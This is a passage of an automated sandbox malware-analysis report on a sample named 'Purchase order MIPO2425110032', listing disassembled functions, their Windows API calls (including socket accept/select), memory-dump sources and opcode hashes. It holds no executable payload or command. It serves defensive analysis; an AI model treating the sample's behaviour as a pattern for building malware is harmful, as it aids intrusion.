                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow
                                                            • String ID:
                                                            • API String ID: 312131281-0
                                                            • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                            • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                            • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                            • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                            Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastacceptselect
                                                            • String ID:
                                                            • API String ID: 385091864-0
                                                            • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                            • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                            • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                            • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                            Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                            • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                            • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                            • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                            Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                            • GetStockObject.GDI32(00000011), ref: 00430258
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                            • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateMessageObjectSendShowStock
                                                            • String ID:
                                                            • API String ID: 1358664141-0
                                                            • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                            • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                            • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                            • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                            Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                            • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                            • String ID:
                                                            • API String ID: 2880819207-0
                                                            • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                            • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                            • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                            • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                            Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                            • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                            • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                            • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                            • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                            • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                            • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                            Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 0043392E
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • __wsplitpath.LIBCMT ref: 00433950
                                                            • __wcsicoll.LIBCMT ref: 00433974
                                                            • __wcsicoll.LIBCMT ref: 0043398A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                            • String ID:
                                                            • API String ID: 1187119602-0
                                                            • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                            • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                            • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                            • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                            Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                            • String ID:
                                                            • API String ID: 1597257046-0
                                                            • Opcode ID: 85ce66059447764998bfd0deaf318f73bc094a5b7b9aaa37ae85bace7a2c1358
                                                            • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                            • Opcode Fuzzy Hash: 85ce66059447764998bfd0deaf318f73bc094a5b7b9aaa37ae85bace7a2c1358
                                                            • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                            Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                            • __malloc_crt.LIBCMT ref: 0041F5B6
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentStrings$Free__malloc_crt
                                                            • String ID:
                                                            • API String ID: 237123855-0
                                                            • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                            • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                            • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                            • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                            Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyObject$IconWindow
                                                            • String ID:
                                                            • API String ID: 3349847261-0
                                                            • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                            • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                            • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                            • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                            Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                            • String ID:
                                                            • API String ID: 2223660684-0
                                                            • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                            • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                            • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                            • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                            Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                            • LineTo.GDI32(?,?,?), ref: 00447326
                                                            • EndPath.GDI32(?), ref: 00447336
                                                            • StrokePath.GDI32(?), ref: 00447344
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 2783949968-0
                                                            • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                            • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                            • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                            • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                            Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                            • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                            • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 2710830443-0
                                                            • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                            • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                            • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                            • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                            Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                            • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                              • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                              • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                            • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                            • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                            • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                            Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00472B63
                                                            • GetDC.USER32(00000000), ref: 00472B6C
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                            • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
